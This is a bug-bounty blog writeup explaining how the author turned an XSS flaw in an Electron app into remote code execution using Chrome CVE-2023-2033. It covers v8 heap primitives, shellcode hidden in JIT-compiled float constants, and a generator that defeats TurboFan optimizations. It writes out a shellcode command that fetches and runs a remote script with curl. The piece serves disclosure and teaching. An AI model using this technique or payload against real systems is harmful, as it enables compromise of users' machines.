Weaponizing Chrome CVE-2023-2033 for RCE in Electron: Some Assembly Required

Tue Mar 12 21:30:17 UTC 2024

Background

I discovered a React createElement based XSS bug in the core functionality of an application with a bug bounty program that had a desktop application. I'd found a couple of these types of bugs in this application before, and knew roughly what the expected payout would be. I wanted to turn the XSS vulnerability into a remote code execution vulnerability on the hosts of the desktop application users. The desktop application was running a version of Electron that used a Chrome version from roughly March 2023 and had Chrome sandboxing disabled in the main renderer window. I needed an RCE PoC to show impact. This is the story of how I got there. Heavy disclaimer: I had no browser exploitation experience before this, and the process was a learning experience for me. There may be minor, and even major, nuances I misunderstood or got wrong here, so take everything with this in mind.

Weaponized RCE PoCs for Chrome vulnerabilities less than a year old are not readily available online. Some of the type confusion bugs over the last year do have PoCs that go as far as to implement v8 heap read/write/addrof primitives. These public PoCs all seem to be built against d8, v8's developer shell. In practice, some of these weren't going to work on the targeted Chrome version, at least not without extensive modifications, because v8 runs with very different flags under Chrome than in a local d8 test run and behaves very differently as a result.

The target: Chrome/110.0.5481.192 Electron/23.2.0 on x86_64 Linux. For the purposes of this writeup, a very minimal Electron application was built using electron-forge to package a production build that ran an unsandboxed main renderer window and navigated to a local webserver that hosted a site with the exploit code.

CVE-2023-2033 ended up being the vulnerability that was chosen. A public PoC with v8 heap read/write/addrof primitives was readily available online and, after some tinkering, seemed to work reliably on the targeted Electron version. The following writeup is on weaponizing these primitives to achieve mostly stable and reliable RCE on amd64 Linux. How these primitives are implemented on top of the type confusion vulnerability is beyond the scope of this blog; they can essentially be treated as a black box thanks to the wonderful work done in mistymntncop's PoC that implements them.

Exploit development was done locally against a running production Electron application, attaching GDB to the renderer process that ran the exploit code. A local d8 debug version was compiled and used for some small tests to better understand how JS objects are laid out in v8 memory, as well as how TurboFan compiled JIT code was intended to look, but it was not used for exploit development or testing, as it behaved differently than the production Electron application.

Getting the v8 heap primitives working

Mistymntncop's PoC was used as the starting place for this exploit. To use this as a base, it was required to get the v8 heap primitives implemented here working on the targeted version of Chrome.

First, all of the d8 native syntax needed to be removed from the PoC exploit primitives that this exploit was built on. The target was a production Chrome instance, not a debug d8 instance, so these lines threw syntax errors. In this case, this just meant commenting out all of the %DebugPrint lines. It was also required to bulk replace calls to print() with calls to console.log(), since in Chrome print() attempts to open a printing prompt instead of logging out text.

Getting the v8 heap read/write/addrof primitives from mistymntncop's PoC code to work on the target Chrome version was a little tricky. It was written and tested against a specific version of d8, and not written for Chrome. At first when an HTML document that included the exploit.js script was loaded, it was observed that the exploit failed to set up the primitives, and a JavaScript error appeared in the console.

Primitive errors

Following the old OffSec mantra of "Try Harder", these primitives were able to install properly by just running the pwn() function that set everything up four times. On the fourth run, instead of throwing an error, it usually successfully set up the primitives. The usage of them from the stock PoC example was observed to be working.

Working primitives

Code was added to the exploit that made a new pwn() call after a timeout of 0, 100, 200, and 300 milliseconds to attempt to install these primitives correctly.

V8 heap sandbox breakout theory

Having read/write/addrof primitives for the v8 heap was useful, but did not provide code execution for free. After reviewing a couple of different writeups that dealt with this problem, it seemed the best bet was to force TurboFan (v8's top level JIT compiler) to optimize a function with Float64 Typed Array data in it, such that a movabs instruction with an 8 byte immediate argument was generated for each float in the array. Each 8 byte immediate contained up to 6 bytes of shellcode and a 2 byte jmp instruction to jump into the immediate value of the next movabs instruction. The v8 heap read/write/addrof primitives could then be used to tinker with the code addresses of functions to try to get the instruction pointer to jump into the shellcode chunks.

The first writeup, by Mem2019, included a function with shellcode that made an execve syscall to execute /bin/sh. This and an additional function were added right before the pwn() calls.

Functions added

The foo function was called several times to cause TurboFan to compile and optimize the function, which was necessary to generate the movabs instructions with long 8 byte immediate arguments.

The shellcode that was assembled and encoded into Float64s was lifted from Mem2019's blog. This shellcode was generated with this Python script, also lifted from Mem2019.

Shellcode maker base

These 8 byte hex values were then converted to Float64s. The foo() function that returned the Float64s in an array was taken and was executed with GDB and d8. The TurboFan compiled optimized assembly code for the foo() function was inspected.
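The hex to Float64 conversion step above is plain bit reinterpretation and can be sketched with Python's struct module. This is a minimal sketch, not the converter used for the writeup: the helper names are hypothetical and the sample values are harmless placeholders rather than real chunks.

```python
import struct


def u64_to_float64(value: int) -> float:
    """Reinterpret a 64-bit unsigned integer's bit pattern as an IEEE 754 double."""
    return struct.unpack("<d", struct.pack("<Q", value))[0]


def float64_to_u64(value: float) -> int:
    """Inverse of u64_to_float64: recover the raw 64-bit pattern of a double."""
    return struct.unpack("<Q", struct.pack("<d", value))[0]


# Placeholder bit patterns, chosen only to illustrate the conversion.
samples = [0x3FF0000000000000, 0x4000000000000000, 0x0000000000000001]

for raw in samples:
    as_float = u64_to_float64(raw)
    # repr() emits the shortest decimal string that parses back to the same
    # double, so the literal survives being pasted into source code.
    assert float64_to_u64(float(repr(as_float))) == raw
    print(f"{raw:#018x} -> {as_float!r}")
```

One caveat with this approach: bit patterns that decode to NaN do not round-trip through a decimal literal, so a converter like this should check each value the way the assert above does.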

TurboFan generated asm

As expected, a series of movabs instructions with long 8 byte immediate values that contained the shellcode were created by the TurboFan compiled and optimized foo() function.

Playing with the primitives

Based on the research from Mem2019's writeup, the addrof primitive was used on both the foo() and f() functions to get a v8 heap pointer to the backing object. The read primitive was then used to read the JIT code address of the function 0x17 bytes from the start of the object pointer. To test this, code was added to the end of the pwn function that attempted to get the address of both the foo() and f() functions, and to read 8 bytes of memory 0x17 bytes after the start of each address.

F and foo addresses

The primitives appeared to be working, and it appeared possible to get the addresses of function objects and read memory from their address offset by a value. If these were actually the pointers the functions used to determine what code to run when a function executes, it was expected to be possible to make a write call to overwrite function f()'s JIT address with a pointer to function foo()'s, and upon calling f(), it was expected to instead see the result of calling foo(). The following code was added to the pwn() function:

F and foo swap

When this actually ran, and the primitives installed correctly, it was observed that the behavior of function f() was successfully changed to act as if it was function foo().

F and foo swap run

Seeking instruction pointer control

Mem2019's writeup suggested that by writing to this jitAddr offset from a function object and calling the function, the lower 32 bits of the instruction pointer could be controlled. To see what happened when this was attempted, instead of writing the jitAddr of function foo() to function f(), the value 0x4142434445464748 was written. The automatic calls to pwn() were removed, and it was manually called from Chrome DevTools after GDB was attached to the renderer process. If the instruction pointer could be controlled this way, it was expected to observe a segmentation fault with the lowest 32 bits of the instruction pointer matching the lowest 32 bits of the garbage test address.

Test crash

The crash that occurred was inspected and it was observed that this was not actually the case. The crash occurred when attempting to read memory from $rcx+0x7, and the low 32 bits of $rcx matched the low 32 bits of the written jitAddr. After this read into $rcx, a jmp occurred that set the instruction pointer to $rcx. A couple of instructions back, a familiar 0x17 offset from the value stored in $rdi being read into the low 32 bits of $rcx was visible. Presumably $rdi stored a pointer to the function object, and the value read into the low bits of $rcx was the jitAddr. $r14 was then added to $rcx, presumably a base that mapped v8 heap addresses to native heap addresses. If what was read from $rcx+0x7 into $rcx before the jump could be controlled, the instruction pointer could be controlled. To try to understand what normally resided there, another renderer crash was caught in GDB where, instead of writing the fixed value, fooJitAddr | 0xF0000000 was written. This set the high bits of the 32 bit value, in the hope of seeing another segmentation fault when attempting to read memory from $rcx+0x7. Based on previously read addresses, it was expected that these bits were normally 0.

Finding code addr

When this crash was captured, the segfault occurred in the same spot on the same memory read attempt. This time, however, it was possible to recover the intended original value of the foo function's JIT address by reading the low 32 bits stored at $rdi+0x17 and ANDing them with ~(0xF0000000). This gave back the original intended address. $r14 was added to it, and the memory address 0x7 off from that sum was read to get the value that, without this tampering, would have been read into $rcx before jumping to it. GDB was used to inspect the instructions at this address.

Function code instructions

Observing the instructions that would have been jumped to, the intended movabs instructions with 8 byte immediate values were present. Because of this, it was inferred that this was the TurboFan generated JIT compiled code for the foo() function. GDB was used to inspect the first 3 instructions parsed at 2 bytes into the first movabs instruction, and the first part of the shellcode was visible. Subtracting the intended start of the function from the entrance into the shellcode, it was calculated that if the function had been jumped into 0x7c bytes further than intended, the shellcode would have begun executing instead of the intended TurboFan generated code.

Seeing shellcode

Gaining instruction pointer control

Based on the previous testing, it was expected that a read of fooJitAddr+0x7 would return the pointer to the compiled TurboFan generated code. Upon actually testing this, it was observed that the address was quite similar to the one in the last test. This address was a native heap address, not a v8 heap address, so the primitives could not be used to read and write shellcode at the location on the heap that was going to be jumped to. However, the address could be read, 0x7c could be added to it, and it could be overwritten with this sum. This would lead to the overwritten address getting loaded into $rcx by the instruction that had previously segfaulted, immediately before the jmp $rcx instruction. This would jump into executing the 8 byte immediate value in the first movabs instruction generated by TurboFan for the foo function with the Float64s containing the shellcode.

The pwn function was modified to do this, and it looked like the following:

Foo code ptr overwrite

When this was executed successfully in the vulnerable Electron version, the call to function foo() after the write led to the TurboFan compiled code being jumped into 0x7c bytes further than intended, where the 8 byte chunks of shellcode started. The shellcode ran successfully, and execve with /bin/sh was called, leading to the following in Electron.

/bin/sh run

The renderer process was gone, as it had replaced itself with /bin/sh and exited. In the GDB session attached to the renderer before running the exploit, it was observed that /bin/sh was successfully executed. On the system used to write the exploit it happened to be a symlink to /usr/bin/dash.

gdb /bin/sh run

This was far enough to prove remote code execution was possible, but it wasn't a useful proof of concept payload: an attacker has no way to interact with the stdio of a running Chrome renderer process. It was desirable to write more useful shellcode that called /bin/sh with arguments that actually did something impactful.

Writing more useful shellcode

It was necessary to write more useful shellcode that showed ability to execute arbitrary scripts pulled from a remote server. To do this, shellcode was written that ran /bin/sh '$(/bin/curl www.turb0.one/files/s)'. The following shellcode was written that could reasonably do this, and had instructions that were all less than or equal to 6 bytes, so that they could fit in the 8 byte immediate movabs values and leave 2 bytes of room for the jmp at the end into the next 8 byte immediate value.

naiveshellcode

An int3 instruction was included at the beginning so that GDB would break on the shellcode start and the generation of the movabs instructions with 8 byte immediate values by TurboFan could be verified. These 8 byte hexadecimal numbers containing the shellcode were run through this likely overprecise online tool to convert the shellcode chunks to Float64 values for use in the foo() function. The foo() function now looked like the following:

naiveshellcode foo

Due to the change in the number of entries in the array, the TurboFan compiled code actually looked a bit different. The offset from the address of the compiled function that was jumped into had to be changed. The same trick to segfault with known addresses from earlier was used, and the offset was found to be 0x82. The previous pwn() function was updated to use this offset instead of 0x7c. With this change, the exploit was run with GDB attached to the renderer process, and the int3 breakpoint was hit.

naiveshellcode fail

The shellcode was reached, and execution was occurring within it. However, when execution was continued, a segfault occurred in the shellcode instead of /bin/sh being executed.

Troubleshooting longer shellcode

When attempting to work out where and why the segfault occurred, it was clear what had gone wrong with the shellcode. Some instructions before the instruction pointer were listed, and it was observed that the expected movabs instructions with 8 byte immediate values spaced 0x14 bytes apart were not always present.

Shellcode broken assumptions

It appeared that TurboFan had generated code for the foo() function that optimized the loading of some of the repeated values in the Float64 array that the shellcode lived in. This should have been expected, as TurboFan is v8's top level JIT compiler, and is meant to generate the most optimized JIT code. This meant that if longer shellcode payloads were to be written by this method, it would be necessary to make sure the shellcode didn't repeat itself, so TurboFan wouldn't be able to perform these optimizations instead of generating the desired movabs instructions with 8 byte immediate values.
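Whether an array is exposed to this behavior can be checked before it ever reaches the JIT by looking for repeated 8 byte values. The following is a small sketch of such a check; the function name and the sample values are hypothetical placeholders, not output of the actual generator.

```python
from collections import Counter


def repeated_values(chunks: list[int]) -> dict[int, int]:
    """Return every 64-bit value that appears more than once, with its count."""
    counts = Counter(chunks)
    return {value: n for value, n in counts.items() if n > 1}


# Placeholder 8-byte values; the first and third are deliberately identical.
chunks = [
    0x1111111111111111,
    0x2222222222222222,
    0x1111111111111111,
    0x3333333333333333,
]

for value, n in repeated_values(chunks).items():
    print(f"{value:#018x} appears {n} times and may share a single load")
```

An empty result means every element is distinct, which is the property the rest of this writeup relies on.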

Writing an anti optimizing shellcode generator

It was necessary to modify the shellcode generating python script to write "anti optimization" shellcode so that TurboFan wouldn't be able to optimize out any of the desired movabs instructions that contained the shellcode. In its original state, when an encoded instruction didn't fill the entire 6 bytes of space before the jmp instruction into the next piece of shellcode, the extra bytes in between were filled with nop instructions. This meant that the same Float64 would be generated for the same <= 6 byte chunk of shellcode, which would allow for the optimization behavior from TurboFan to occur that needed to be avoided. Instead, these instructions could be encoded so that the jmp came immediately after the instructions, with the jmp distance modified to reflect that it no longer came at the end, and the rest of the 8 bytes could be filled with procedurally generated junk bytes that instead of getting executed like the nops just got jumped past. This would prevent the Float64 values generated from each chunk of shellcode from being the same for chunks of shellcode less than 6 bytes. The only repeating chunks of shellcode in the longer shellcode that had been written all had room for these additional garbage anti optimizing bytes. The shellcode generator script was modified to implement this, and ended up with functionality that looked like the following:

Better shellcode generator

The script was rerun, and the output was run through a Float64 converter to get the floats to replace the content of the array that foo() returned. After attaching GDB and rerunning the exploit with this new payload, the int3 breakpoint was hit again. Upon continuing, instead of the exploit running successfully and /bin/sh executing with the desired arguments, the program segfaulted again. Inspecting the instructions leading up to the instruction pointer, it was clear that the crash had occurred in the shellcode section, and that the instructions appeared correct. This meant that the optimizing behavior of TurboFan was successfully mitigated. The instructions appeared to be the same, but the distance between the movabs instructions had changed.

Gap size change

The size of the movsd instruction was observed to have changed because it needed to take a larger argument. The generated instructions were reviewed, and it was determined that the assumption of the gap between movabs instructions being 0x14 only held for the first 15. After that, due to larger sizes being needed for the instructions between the movabs instruction, the gap became 0x17. A counter was added to the shellcode generator to account for this in the jmp instructions into the next chunk of shellcode. The segfault occurred because the shellcode didn't jump far enough from the last instruction, and should have instead jumped 3 bytes further. The generator was updated to account for this, and the python looked like the following:

Final shellcode generator

Achieving stager shellcode execution

The shellcode generator now produced anti optimizing code, so that TurboFan always generated a movabs instruction for each chunk of shellcode, and supported the longer jumps between movabs immediate values later in the TurboFan compiled code. The int3 at the start of its shellcode was removed, and a final payload was regenerated and reencoded. The staged payload at www.turb0.one/files/s just had the content /bin/touch /tmp/rcepoc. The exploit was rerun with the final payload. Chrome DevTools reported that the renderer process was gone, suggesting the shellcode had reached the execve syscall successfully. ls /tmp was run, and it was observed that a /tmp/rcepoc file had been created, showing that the shellcode had run successfully.

RCE PoC file written

This showed that the second stage script had successfully been pulled from the web server and executed. A working exploit had been created that performed remote code execution in the target Electron version by leveraging v8 heap primitives written for CVE-2023-2033 by mistymntncop with techniques inspired by and adapted from Mem2019's research.

Wrapping things up and fully weaponizing

The calls to pwn() that automatically attempt to run the exploit when the page loads were uncommented. The primitives didn't set up properly every time, and sometimes they crashed instead of working properly. The failure rate on the test machine felt like about 10%. To attempt to mitigate this, a file, exploitloader.html, was created that iframed 5 instances of exploit.html, which loaded the actual exploit.js that had the exploit code. This was designed to lead to more consistent execution of the RCE PoC payload.
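As a rough back of the envelope check on why repeating the attempt helps, the chance that at least one of several attempts succeeds can be estimated as below. This assumes each attempt fails independently with the same probability, which was not measured here and may not hold when the attempts share a renderer process. The 10% figure is the rough estimate from above, and the function name is hypothetical.

```python
def chance_at_least_one_succeeds(failure_rate: float, attempts: int) -> float:
    """Probability that not every attempt fails, assuming independent attempts."""
    if not 0.0 <= failure_rate <= 1.0:
        raise ValueError("failure_rate must be between 0 and 1")
    if attempts < 1:
        raise ValueError("attempts must be at least 1")
    return 1.0 - failure_rate ** attempts


# Rough estimate from the text: about 10% failure per attempt, 5 attempts.
for attempts in (1, 2, 5):
    p = chance_at_least_one_succeeds(0.10, attempts)
    print(f"{attempts} attempt(s): {p:.5f}")
```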

Final versions of files mentioned in this writeup can be found here:

RCE exploit demonstration page
RCE exploit JavaScript
Exploit shellcode generator script

Conclusion

This writeup covers parts of the research process I went through to weaponize CVE-2023-2033 for RCE with a lot of long dead ends cut out. Some conclusions in this writeup were drawn more quickly and understandings reached more directly than they occurred in practice. I went into this with no past browser exploitation experience or knowledge, and left with some functional understanding of some browser exploitation related topics. I was able to get a working full chain PoC put together and a report in for the application I was targeting, and the report was remediated. In the process, I was able to learn tricks for going from v8 primitives to shellcode execution, work out how to get instruction pointer control on the version of Chrome I had to target, and build a script to create anti TurboFan optimization shellcode.
